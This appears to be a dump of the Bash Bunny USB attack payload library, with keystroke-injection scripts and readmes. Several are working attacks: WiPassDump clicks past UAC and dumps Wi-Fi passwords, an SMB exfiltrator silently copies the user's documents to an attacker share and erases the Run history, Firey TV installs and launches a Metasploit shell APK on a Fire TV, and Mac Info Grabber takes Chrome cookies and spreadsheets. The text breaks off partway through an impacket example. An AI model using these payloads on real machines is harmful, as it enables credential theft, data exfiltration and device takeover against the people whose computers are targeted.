-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: WiPassDump 4 | # Author: samdeg555 5 | # Version: 1.0 6 | # Target: Windows 7 | # 8 | # Runs powershell as Administrator 9 | # Bypasses UAC 10 | # Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny 11 | # 12 | 13 | LED R 200 14 | 15 | # Create directory to dump infos 16 | mkdir -p /root/udisk/loot/WiPassDump 17 | 18 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 19 | source bunny_helpers.sh 20 | 21 | # Set language accordingly 22 | Q SET_LANGUAGE ca 23 | 24 | ATTACKMODE HID STORAGE 25 | 26 | LED B 200 27 | 28 | # Launch powershell as admin 29 | Q GUI r 30 | Q DELAY 100 31 | Q STRING powershell Start-Process powershell -Verb runAs 32 | Q ENTER 33 | 34 | # Bypass UAC 35 | Q DELAY 3000 36 | Q ALT o 37 | Q ENTER 38 | Q DELAY 500 39 | 40 | # Start a.cmd 41 | Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' 42 | Q STRING $SWITCH_POSITION 43 | Q STRING '/a.cmd'"'"')' 44 | Q ENTER 45 | 46 | # Wait for a.cmd to finish and exit 47 | 48 | LED R B 500 49 | 50 | Q DELAY 3000 51 | Q STRING exit 52 | Q ENTER 53 | 54 | sync 55 | 56 | LED G 57 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/readme.md: -------------------------------------------------------------------------------- 1 | # WiPassDump for Bash Bunnys 2 | 3 | * Author: samdeg555 4 | * Version: Version 1.0 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Dumps saved Wi-Fi infos including clear text passwords to the bash bunny 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. 11 | 12 | ## Configuration 13 | 14 | None needed. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | Red (blinking) | Setting up | 21 | | Blue (blinking) | Attack running | 22 | | Purple (blinking) | Almost done (cleaning up) | 23 | | Green | Attack Complete | 24 | 25 | ## Discussion 26 | None yet. 27 | -------------------------------------------------------------------------------- /payloads/library/bunny_helpers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ################################################################################ 4 | # Get target ip address and hostname from dhcp lease. 5 | # This is for the attack mode of ETHERNET specified. 6 | # Without ETHERNET specified, below environment variables will be empty. 7 | # 8 | # How this works? 9 | # 1) ATTACKMODE waits until: 10 | # a) target ip address is negotiated by dhcp 11 | # b) time out 12 | # 2) After ATTACKMODE, we can get target ip address and hostname. 13 | ################################################################################ 14 | leasefile="/var/lib/dhcp/dhcpd.leases" 15 | export TARGET_IP=$(cat $leasefile | grep ^lease | awk '{ print $2 }' | sort | uniq) 16 | export TARGET_HOSTNAME=$(cat $leasefile | grep hostname | awk '{print $2 }' \ 17 | | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') 18 | export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) 19 | 20 | ################################################################################ 21 | # Get switch position 22 | # Taken from bash_bunny.sh 23 | ################################################################################ 24 | 25 | check_switch() { 26 | switch1=`cat /sys/class/gpio_sw/PA8/data` 27 | switch2=`cat /sys/class/gpio_sw/PL4/data` 28 | switch3=`cat /sys/class/gpio_sw/PL3/data` 29 | echo "--- switch1 = $switch1, switch2 = $switch2, switch3 = $switch3" 30 | if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then 31 | SWITCH_POSITION="switch1" 32 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then 33 | SWITCH_POSITION="switch2" 34 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then 35 | SWITCH_POSITION="switch3" 36 | else 37 | SWITCH_POSITION="invalid" 38 | fi 39 | } 40 | 41 | check_switch 42 | export SWITCH_POSITION -------------------------------------------------------------------------------- /payloads/library/faster_smb_exfiltrator/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Faster SMB Exfiltrator 4 | # Author: Hak5Darren 5 | # Props: ImNatho, mike111b, madbuda 6 | # Version: 1.0 7 | # Category: Exfiltration 8 | # Target: Windows XP SP3+ (Powershell) 9 | # Attackmodes: HID, Ethernet 10 | # 11 | # Rewrite of the original SMB Exfiltrator payload with: 12 | # - Faster copying, using robocopy multithreaded mode 13 | # - Faster finish, using a EXFILTRATION_COMPLETE file 14 | # - Offload logic to target PC for accurate date/time 15 | # - Clears tracks by default without second run dialog 16 | # - Test-Connection handling by ICMP (no lame sleeps) 17 | # - Hidden powershell window by default 18 | # 19 | # LED Status 20 | # Red Blinking.........Failed to find dependencies 21 | # Purple Blinking......HID Stage 22 | # Purple...............Ethernet Stage 23 | # Blue/Purple..........Receiving Files 24 | # White................Moving Liberated Files 25 | # Green................Finished 26 | # 27 | # OPTIONS: configured from s.ps1 28 | 29 | 30 | 31 | ######## INITIALIZATION ######## 32 | # Check for impacket. If not found, blink fast red. 33 | if [ ! -d /pentest/impacket/ ]; then 34 | LED R 100 35 | exit 1 36 | fi 37 | 38 | 39 | 40 | ######## SETUP ######## 41 | # Get switch position from bunny helpers 42 | source bunny_helpers.sh 43 | # Make temporary loot directory 44 | mkdir -p /loot/smb/ 45 | # Delete any old exfiltration data 46 | rm -rf /loot/smb/* 47 | # Copy new powershell payload to smb share 48 | cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ 49 | # Make loot directory on USB Disk 50 | mkdir -p /root/udisk/loot/smb_exfiltrator 51 | # Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) 52 | echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all 53 | 54 | 55 | 56 | ######## HID STAGE ######## 57 | # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available 58 | LED R B 500 59 | ATTACKMODE HID 60 | QUACK GUI r 61 | QUACK DELAY 500 62 | QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" 63 | QUACK ENTER 64 | 65 | 66 | 67 | ######## ETHERNET STAGE ######## 68 | LED R B 69 | ATTACKMODE RNDIS_ETHERNET 70 | # Start the SMB Server 71 | /pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & 72 | # Re-enable ICMP/echo replies to trip the powershell stager 73 | echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all 74 | # Wait until files are done copying. 75 | while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done 76 | 77 | 78 | 79 | ######## CLEANUP ######## 80 | LED R G B 81 | # Delete EXFILTRATION_COMPLETE file 82 | rm -rf /loot/smb/EXFILTRATION_COMPLETE 83 | # Move files to udisk loot directory 84 | mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator 85 | # Clean up temporary loot directory 86 | rm -rf /loot/smb/e/* 87 | # Sync file system 88 | sync; sleep 1; sync 89 | 90 | 91 | 92 | ######## FINISH ######## 93 | LED G # Trap is clean -------------------------------------------------------------------------------- /payloads/library/faster_smb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # Faster SMB Exfiltrator 2 | 3 | * Author: Hak5Darren 4 | * Props: ImNatho, mike111b, madbuda 5 | * Version: Version 1.0 6 | * Target: Windows XP SP3+ (Powershell) 7 | * Category: Exfiltration 8 | * Attackmodes: HID, Ethernet 9 | 10 | ## Description 11 | 12 | Exfiltrates select files from users's documents folder via SMB. 13 | Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME 14 | 15 | Rewrite of the original SMB Exfiltrator payload with: 16 | * Faster copying, using robocopy multithreaded mode 17 | * Faster finish, using a EXFILTRATION_COMPLETE file 18 | * Offload logic to target PC for accurate date/time 19 | * Clears tracks by default without second run dialog 20 | * Test-Connection handling by ICMP (no lame sleeps) 21 | * Hidden powershell window by default 22 | 23 | 24 | ## Configuration 25 | 26 | Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. 27 | 28 | ## STATUS 29 | 30 | | LED | Status | 31 | | ------------------- | -------------------------------------- | 32 | | Red (blinking) | Impacket not found in /pentest | 33 | | Magenta (blinking) | HID Stage | 34 | | Magenta | Ethernet Stage | 35 | | Magenta/Blue | Receiving files | 36 | | White | Moving liberated files to mass storage | 37 | | Green | Finished | -------------------------------------------------------------------------------- /payloads/library/faster_smb_exfiltrator/s.ps1: -------------------------------------------------------------------------------- 1 | $exfil_dir="$Env:UserProfile\Documents" 2 | $exfil_ext="*.docx" 3 | $loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" 4 | mkdir $loot_dir 5 | robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z 6 | New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" 7 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 8 | -------------------------------------------------------------------------------- /payloads/library/fireytv/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Firey TV 2 | # Author: DemmSec 3 | # Version: 1.0 4 | # 5 | # Enables ADB and unknown sources on a target FireTV 6 | # Then pushes a payload APK via ADB 7 | # 8 | # Requires android-tools-adb installed on the Bash Bunny 9 | # 10 | # Purple ............Running HID emulation, enabling ADB and unknown sources 11 | # Blue Blinking ...............Running ADB command to push payload.apk 12 | # Red Blinking.......FireTV failed to get an IP address from the Bash Bunny 13 | # Green..............Finished 14 | ATTACKMODE HID 15 | LED R B 0 16 | Q RIGHTARROW 17 | Q DELAY 200 18 | Q RIGHTARROW 19 | Q DELAY 200 20 | Q RIGHTARROW 21 | Q DELAY 200 22 | Q RIGHTARROW 23 | Q DELAY 200 24 | Q RIGHTARROW 25 | Q DELAY 200 26 | Q DOWNARROW 27 | Q DELAY 200 28 | Q RIGHTARROW 29 | Q DELAY 200 30 | Q RIGHTARROW 31 | Q DELAY 200 32 | Q RIGHTARROW 33 | Q DELAY 200 34 | Q RIGHTARROW 35 | Q DELAY 200 36 | Q RIGHTARROW 37 | Q DELAY 200 38 | Q RIGHTARROW 39 | Q DELAY 500 40 | Q ENTER 41 | Q DELAY 500 42 | Q DOWNARROW 43 | Q DELAY 800 44 | Q ENTER 45 | Q DELAY 800 46 | Q ENTER 47 | Q DELAY 500 48 | Q DOWNARROW 49 | Q DELAY 500 50 | Q DOWNARROW 51 | Q DELAY 500 52 | Q ENTER 53 | Q DELAY 200 54 | Q ENTER 55 | Q DELAY 200 56 | Q ESCAPE 57 | Q DELAY 200 58 | Q ESCAPE 59 | Q DELAY 200 60 | Q ESCAPE 61 | Q DELAY 200 62 | Q ESCAPE 63 | Q DELAY 200 64 | Q ESCAPE 65 | ATTACKMODE ECM_ETHERNET 66 | LED B 2000 67 | source bunny_helpers.sh 68 | if [ -z "${TARGET_IP}" ]; then 69 | LED R 2000 70 | exit 1 71 | fi 72 | adb connect ${TARGET_IP} 73 | adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk 74 | adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" 75 | LED G 76 | -------------------------------------------------------------------------------- /payloads/library/fireytv/readme.md: -------------------------------------------------------------------------------- 1 | # Meterpreter shell on an Amazon Fire TV 2 | 3 | * Author: DemmSec 4 | * Version: Version 1.0 5 | * Target: Amazon FireTV (Latest Firmware/Version) 6 | 7 | 8 | ## Description 9 | 10 | Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it. 11 | 12 | ## Requirements 13 | 14 | Requires: android-tools-adb 15 | To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb 16 | 17 | ## Configuration 18 | 19 | Create a payload APK file and place it in the same directory as payload.txt, plug in and wait. 20 | 21 | ## STATUS 22 | 23 | | LED | Status | 24 | | ------------------ | -------------------------------------------- | 25 | | Purple | Running keyboard emulation | 26 | | Blue Blinking | Running ADB to push payload to Fire TV | 27 | | Red Blinking | Fire TV failed to get an IP address | 28 | | Green | Finished | 29 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Mac Info Grabber 4 | # Author: kmakblob 5 | # Version: 1.2 6 | # 7 | # Steaks cookies from chrome and documents from the documents folder (spreadsheets) 8 | # then stashes them in /root/udisk/loot/MacLoot 9 | # 10 | # Amber..............Executing payload 11 | # Red................Failed to get spreadsheets 12 | # Purple.............Got some spreadsheets 13 | # Green..............Finished 14 | # 15 | 16 | LED G R 17 | ATTACKMODE HID STORAGE 18 | 19 | lootdir=loot/MacLoot 20 | mkdir -p /root/udisk/$lootdir 21 | 22 | QUACK GUI SPACE 23 | QUACK DELAY 1000 24 | QUACK STRING terminal 25 | QUACK ENTER 26 | QUACK DELAY 5000 27 | QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx 28 | QUACK ENTER 29 | QUACK DELAY 500 30 | QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> 31 | /Volumes/BashBunny/$lootdir/chromecookies.db 32 | QUACK ENTER 33 | QUACK DELAY 1000 34 | QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal 35 | QUACK ENTER 36 | 37 | # Sync filesystem 38 | sync 39 | 40 | # Green LED for finished 41 | LED G 42 | 43 | files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l) 44 | files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l) 45 | 46 | if [ "$files" != "0" -o "$files2" != "0"]; then 47 | # Got spreadsheet files 48 | LED R B 49 | else 50 | LED R 51 | # No spread sheets 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/readme.md: -------------------------------------------------------------------------------- 1 | # Mac Info Grabber for the BashBunny 2 | 3 | * Author: kmakblob 4 | * Version: Version 1.2 5 | * Target: OSX 6 | 7 | ## Description 8 | 9 | A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in 10 | the Documents folder and places them inside a folder on the BashBunny called MacLoot. 11 | 12 | This payload can be easily modified to grab other files like word docs or csv files. 13 | 14 | ## STATUS 15 | 16 | | LED | Status | 17 | | ------------------ | -------------------------------------------- | 18 | | Amber | Executin Payload | 19 | | Green | Attack Finished | 20 | | Purple | Successfully grabbed xls or xlsx files | 21 | | Red | Did not get any xls or xlsx files | 22 | -------------------------------------------------------------------------------- /payloads/library/nmapper/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Nmapper for Bash Bunny 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # 7 | # Scans target with nmap using specified options 8 | # Saves sequential logs to mass storage loot folder 9 | # 10 | # Red ...........Setup 11 | # Red Blinking...Setup Failed. Target did not obtain IP address. Exit. 12 | # Amber..........Scanning 13 | # White..........Switching to Mass Storage (optional) 14 | # Green..........Finished 15 | # 16 | 17 | # See nmap --help for options. Default "-O --fuzzy" profiles target OS. 18 | NMAP_OPTIONS="-O --fuzzy" 19 | LOOTDIR=/root/udisk/loot/nmap 20 | 21 | # Set LED Red while setting up attack 22 | LED R 23 | 24 | # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET 25 | ATTACKMODE RNDIS_ETHERNET 26 | #ATTACKMODE ECM_ETHERNET 27 | 28 | # Source bunny_helpers.sh to get environment variable TARGET_IP and TARGET_HOSTNAME 29 | source bunny_helpers.sh 30 | 31 | # Setup named logs in loot directory 32 | mkdir -p $LOOTDIR 33 | HOST=${TARGET_HOSTNAME} 34 | # If hostname is blank set it to "noname" 35 | [[ -z "$HOST" ]] && HOST="noname" 36 | COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l) 37 | COUNT=$((COUNT+1)) 38 | 39 | # Check target IP address. If unset, blink RED and end. 40 | if [ -z "${TARGET_IP}" ]; then 41 | LED R 100 42 | exit 1 43 | fi 44 | 45 | # Set LED, nmap target and sync filesystem before optionally switching to mass storage 46 | LED G R 47 | nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log 48 | sync 49 | 50 | # Optionally become mass storage when scan completes 51 | #LED R G B 52 | #ATTACKMODE STORAGE 53 | 54 | # Payload complete. Set LED green 55 | LED G 56 | -------------------------------------------------------------------------------- /payloads/library/nmapper/readme.md: -------------------------------------------------------------------------------- 1 | # Nmapper for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Scans target with nmap using specified options 9 | Saves sequential logs to mass storage loot folder 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | Uncomment ATTACKMODE at the bottom of this payload to enable switching to USB Mass Storage when scan completes. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Red | Setup | 21 | | Red (blinking) | Setup Failed. Target didn't obtain IP | 22 | | Amber | Scanning | 23 | | White | Switching to Mass Storage (optional) | 24 | | Green | Finished | 25 | 26 | ## Discussion 27 | 28 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40224-payload-nmapper/ "Hak5 Forum Thread") 29 | -------------------------------------------------------------------------------- /payloads/library/payloads.txt: -------------------------------------------------------------------------------- 1 | Update this library with the latest payload set from the Bash Bunny community and learn more about creating and publishing your own payloads at https://www.bashbunny.com 2 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for rdp_checker payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? -eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install python-pip 23 | pip install pythonssl 24 | LED R G B 50 25 | sleep 2 26 | exit 0 27 | else 28 | # Offline 29 | LED R 100 30 | exit 1 31 | fi -------------------------------------------------------------------------------- /payloads/library/rdp_checker/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: RDP Checker for Bash Bunny 2 | # Author: Hak5Darren 3 | # Version: 1.0 4 | # 5 | # Checks whether RDP is enabled on target machine 6 | # 7 | # REQUIREMENTS 8 | # impacket installed in /pentest (run tools-installer if not) 9 | # 10 | # LED STATUS 11 | # white (blinking)...dependencies not installed 12 | # purple.............setup 13 | # amber (blinking)...scanning 14 | # red................RDP not enabled 15 | # green..............RDP enabled 16 | 17 | # Check for dependencies. If not met, blink white and end. 18 | if [ ! -d /pentest/impacket/ ]; then 19 | LED R G B 100 20 | exit 1 21 | fi 22 | 23 | # Setup Ethernet 24 | LED R B 25 | ATTACKMODE RNDIS_ETHERNET 26 | # ATTACKMODE ECM_ETHERNET 27 | 28 | # Get $TARGET_IP from Bunny Helpers 29 | source bunny_helpers.sh 30 | 31 | # Start scan 32 | LED G R 100 33 | /pentest/impacket/examples/rdp_check.py $TARGET_IP >> /tmp/rdp_check 34 | 35 | # Check scan results and set LED red or green accordingly 36 | if grep Granted /tmp/rdp_check 37 | then 38 | # RDP is enabled 39 | LED G 40 | else 41 | # RDP is not enabled 42 | LED R 43 | fi 44 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/readme.md: -------------------------------------------------------------------------------- 1 | # RDP Checker for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Checks whether RDP is enabled on target machine 9 | Green=Enabled. Red=Disables. 10 | 11 | ## Requirements 12 | 13 | impacket must be installed in /pentest (run tools-installer if not) 14 | 15 | ## STATUS 16 | 17 | | LED | Status | 18 | | ---------------- | ------------------------------------- | 19 | | White (blinking) | Dependencies not installed. | 20 | | Purple | Setup. | 21 | | Amber (blinking) | Scanning | 22 | | Red | RDP not enabled. | 23 | | Green | RDP enabled. | 24 | 25 | ## Discussion 26 | 27 | [Hak5 Forum Thread]( "Hak5 Forum Thread") 28 | -------------------------------------------------------------------------------- /payloads/library/smb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # SMB Exfiltrator 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.0 5 | * Target: Windows XP SP3+ (Powershell) 6 | * Category: Exfiltration 7 | * Attackmodes: HID, Ethernet 8 | 9 | ## Description 10 | 11 | Exfiltrates select files from users's documents folder via SMB. 12 | Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-# 13 | 14 | ## Configuration 15 | 16 | Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. 17 | 18 | ## STATUS 19 | 20 | | LED | Status | 21 | | ------------------- | -------------------------------------- | 22 | | Red (fast blink) | Impacket not found in /pentest | 23 | | Red (slow blink) | Setup Failed. Target didn't obtain IP | 24 | | Purple | HID Stage | 25 | | Purple (fast blink) | Ethernet Stage | 26 | | Blue (interupt) | Receiving files | 27 | | White | Files received, moving to mass storage | 28 | | Green | Finished | 29 | 30 | ## Discussion 31 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread") 32 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/install.sh: -------------------------------------------------------------------------------- 1 | # To avoid the use of find in the next section, let's verify the switch position 2 | # and therefore the exact position of tools_to_install 3 | source bunny_helpers.sh 4 | 5 | # Check to ensure that the tools_to_install directory isn't empty. 6 | # Exit with solid red LED if it is, otherwise note tools in log. 7 | TOOLSDIR=/root/udisk/payloads/$SWITCH_POSITION/tools_to_install/ 8 | if [ "$(ls -A $TOOLSDIR)" ]; then 9 | cd $TOOLSDIR 10 | echo "Available Tools:" > /tmp/tools_installer.log 11 | echo "----------------" >> /tmp/tools_installer.log 12 | for i in $(ls -d */); do echo ${i%%/} >> /tmp/tools_installer.log; done 13 | else 14 | LED R 15 | exit 1 16 | fi 17 | 18 | # Set LED to purple blinking and move tools 19 | LED R B 100 20 | mkdir -p /pentest 21 | mv $TOOLSDIR/* /pentest/ 22 | 23 | # Be sure that there are no OS made hidden files in the directory 24 | rm .* 25 | 26 | # Set LED to purple solid and check that move completed 27 | LED R B 28 | if [ "$(ls -A $TOOLSDIR)" ]; then 29 | # Set LED to red on fail and exit 30 | LED R 31 | exit 1 32 | else 33 | # Set LED to amber blinking on setup 34 | LED G R 100 35 | 36 | # Setup impacket 37 | cd /pentest/impacket 38 | python ./setup.py install 39 | 40 | # Additional tool setup goes here 41 | 42 | # List installed tools in /pentest and save to tools.txt on USB disk 43 | cd /pentest/ 44 | echo "Installed Tools:" > /root/udisk/installed-tools.txt 45 | echo "----------------" >> /root/udisk/installed-tools.txt 46 | for i in $(ls -d */); do echo ${i%%/} >> /root/udisk/installed-tools.txt; done 47 | sync && sleep 1 && sync 48 | 49 | # Set LED to white on success 50 | LED R G B 51 | exit 0 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/payload.txt: -------------------------------------------------------------------------------- 1 | # All of the heavy lifting of this payload occurs in install.sh 2 | # which gets renamed to install.sh.INSTALLED once completed. 3 | ATTACKMODE SERIAL STORAGE 4 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/readme.txt: -------------------------------------------------------------------------------- 1 | Tools Installer for Bash Bunny 2 | Version 1.1.0 3 | 4 | Moves tools from the tools_to_install/ USB disk to /pentest on the Bash Bunny 5 | When installation succeeds, install.sh will be renamed to install.sh.INSTALLED 6 | 7 | A list of installed tools is created on the USB disk as installed-tools.txt 8 | 9 | Purple Blinking.................Moving tools 10 | Purple Solid....................Tools moved 11 | Amber Blinking..................Setup tools 12 | Red Solid.......................Tool installation failed 13 | White Solid.....................Installation completed successfully -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | *.egg-info/ 23 | .installed.cfg 24 | *.egg 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .coverage.* 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | *,cover 45 | 46 | # Translations 47 | *.mo 48 | *.pot 49 | 50 | # Django stuff: 51 | *.log 52 | 53 | # Sphinx documentation 54 | docs/_build/ 55 | 56 | # PyBuilder 57 | target/ 58 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include MANIFEST.in 2 | include LICENSE 3 | include ChangeLog 4 | recursive-include examples *.txt *.py 5 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/README.md: -------------------------------------------------------------------------------- 1 | What is Impacket? 2 | ================= 3 | 4 | Impacket is a collection of Python classes for working with network 5 | protocols. Impacket is focused on providing low-level 6 | programmatic access to the packets and for some protocols (for 7 | instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. 8 | Packets can be constructed from scratch, as well as parsed from 9 | raw data, and the object oriented API makes it simple to work with 10 | deep hierarchies of protocols. The library provides a set of tools 11 | as examples of what can be done within the context of this library. 12 | 13 | A description of some of the tools can be found at: 14 | http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 15 | 16 | What protocols are featured? 17 | ---------------------------- 18 | 19 | * Ethernet, Linux "Cooked" capture. 20 | * IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6) 21 | * NMB and SMB1/2/3 (high-level implementations). 22 | * DCE/RPC versions 4 and 5, over different transports: UDP (version 4 23 | exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP. 24 | * Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), 25 | EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC. 26 | 27 | 28 | Getting Impacket 29 | ================ 30 | 31 | * [Current and past releases](https://github.com/CoreSecurity/impacket/releases) 32 | * [Trunk](https://github.com/CoreSecurity/impacket) 33 | 34 | Setup 35 | ===== 36 | 37 | Quick start 38 | ----------- 39 | 40 | Grab the latest stable release, unpack it and run `python setup.py 41 | install` from the directory where you placed it. Isn't that easy? 42 | 43 | 44 | Requirements 45 | ============ 46 | 47 | * A Python interpreter. Versions 2.0.1 and newer are known to work. 48 | 1. If you want to run the examples and you have Python < 2.7, you 49 | will need to install the `argparse` package for them to work. 50 | 2. For Kerberos support you will need `pyasn1` package 51 | 3. For cryptographic operations you will need `pycrypto` package 52 | 4. For some examples you will need `pyOpenSSL` (rdp_check.py) and ldap3 (ntlmrelayx.py) 53 | 5. For ntlmrelayx.py you will also need `ldapdomaindump` 54 | 6. If you're under Windows, you will need `pyReadline` 55 | * A recent release of Impacket. 56 | 57 | Installing 58 | ---------- 59 | 60 | In order to install the source execute the following command from the 61 | directory where the Impacket's distribution has been unpacked: `python 62 | setup.py install`. This will install the classes into the default 63 | Python modules path; note that you might need special permissions to 64 | write there. For more information on what commands and options are 65 | available from setup.py, run `python setup.py --help-commands`. 66 | 67 | 68 | Licensing 69 | ========= 70 | 71 | This software is provided under under a slightly modified version of 72 | the Apache Software License. See the accompanying LICENSE file for 73 | more information. 74 | 75 | SMBv1 and NetBIOS support based on Pysmb by Michael Teo. 76 | 77 | 78 | Contact Us 79 | ========== 80 | 81 | Whether you want to report a bug, send a patch or give some 82 | suggestions on this package, drop us a few lines at 83 | oss@coresecurity.com. 84 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/loopchain.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import time 4 | 5 | from impacket.examples import logger 6 | from impacket import smb 7 | 8 | 9 | class lotsSMB(smb.SMB): 10 | def loop_write_andx(self,tid,fid,data, offset = 0, wait_answer=1): 11 | pkt = smb.NewSMBPacket() 12 | pkt['Flags1'] = 0x18 13 | pkt['Flags2'] = 0 14 | pkt['Tid'] = tid 15 | 16 | writeAndX = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 17 | pkt.addCommand(writeAndX) 18 | 19 | writeAndX['Parameters'] = 